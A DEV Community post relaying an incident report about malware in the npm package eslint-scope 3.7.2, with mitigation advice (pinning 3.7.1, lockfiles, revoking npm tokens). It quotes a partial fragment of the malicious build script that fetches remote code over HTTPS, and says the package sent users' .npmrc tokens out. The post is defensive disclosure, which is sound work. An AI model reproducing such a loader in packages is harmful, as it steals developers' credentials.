DEV Community

Mac Siri
Mac Siri

Posted on

Virus in eslint-scope 3.7.2

I came across this issue and figured I shared it here.

Virus in eslint-scope? #39

Updated blog post:

Update from the maintainers

Incident status report from npm

Please follow the comment by @platinumazure that gives a little insight into what happened:

It also appears that the same code was published in eslint-config-eslint@5.0.2, which has also since been unpublished. See for more information.

In the meantime

  1. Pin the version of eslint-scope to 3.7.1, one way is to add the resolutions to your package.json
  "resolutions": {
    "eslint-scope": "3.7.1"

Verify the dependency version with yarn list eslint-scope. It should print out eslint-scope@3.7.1

  1. Use package-lock.json or yarn.lock and have it in your repo if possible. Do not upgrade to 3.7.2 even if yarn outdated shows that there is a new version available.

  2. Revoke your NPM token as suggested in the comment below You can do the same by logging in to, selecting the "tokens" menu from the account dropdown and removing all tokens listed on the page. Make sure to recreate the relevant tokens if you hook your NPM to external services.

The issue

I don't know what the hell this is but it looks like a virus to me:

[2/3] ⠠ eslint-scope
error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
Exit code: 1
Command: node ./lib/build.js
Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope

SyntaxError: Unexpected end of input
    at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
    at emitOne (events.js:116:13)
    at IncomingMessage.emit (events.js:211:7)
    at (_stream_readable.js:475:10)
    at flow (_stream_readable.js:846:34)
    at resume_ (_stream_readable.js:828:3)
    at _combinedTickCallback (internal/process/next_tick.js:138:11)

The contents of a suspicious file:

    var https=require('https');
    https.get({'hostname':'',path:'/raw/XLeVP82h',headers:{'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',Accept:'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}},(r)=>{
Enter fullscreen mode Exit fullscreen mode

The URL it attempts to load is

Also it attempts to send my .npmrc somewhere.

This is version 3.7.2 that's been published an hour ago.

package managers are a surprising medium to spread viruses, especially when the virus is latched onto a dependency of babel-eslint 😱

Top comments (1)

theodesp profile image
Theofanis Despoudis

Not exactly a virus but an exfiltration tool